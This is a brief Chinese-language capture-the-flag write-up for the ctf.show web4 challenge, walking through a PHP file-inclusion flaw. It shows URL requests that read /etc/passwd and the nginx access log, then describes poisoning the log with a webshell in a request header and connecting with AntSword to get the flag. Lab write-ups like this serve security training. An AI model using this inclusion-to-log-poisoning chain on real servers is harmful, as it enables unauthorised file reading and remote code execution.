ctf.show_web4

查看题目
ctf.show_web4_第1张图片
发现题目要求get请求传输一个url参数,并且看到了include,估计需要使用伪协议进行包含,进行尝试

http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=php://input

请添加图片描述
发现报错error,继续尝试其他协议发现都显示error

尝试直接在后面加文件

http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=/etc/passwd

ctf.show_web4_第2张图片
发现成功显示出文件内容,那么尝试查看日志看看

http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=/var/log/nginx/access.log

请添加图片描述
尝试修改header,在header中写马并使用蚁剑连接日志目录,得到flag

ctf.show_web4_第3张图片

请添加图片描述

ctf.show_web4_第4张图片

你可能感兴趣的:(CTF,安全,web安全,php)